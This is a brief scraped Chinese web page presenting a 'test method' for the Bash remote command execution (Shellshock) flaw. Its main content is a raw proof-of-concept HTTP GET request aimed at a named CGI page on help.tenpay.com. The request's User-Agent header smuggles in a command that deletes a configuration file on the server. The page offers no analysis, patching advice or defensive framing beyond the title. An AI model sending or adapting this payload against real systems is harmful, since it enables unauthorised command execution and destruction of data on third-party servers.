千家信息网

Bash远程解析命令执行漏洞测试方法

发表于:2025-02-01 作者:千家信息网编辑
千家信息网最后更新 2025年02月01日,漏洞利用POC:GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1Host: help.tenpay.comUser-Agent: () {
千家信息网最后更新 2025年02月01日Bash远程解析命令执行漏洞测试方法

漏洞利用POC:

GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1

Host: help.tenpay.com

User-Agent: () { :;}; /bin/rm ./conf/test.xml

Accept: */*

Connection: keep-alive



附件:http://down.51cto.com/data/2368439
0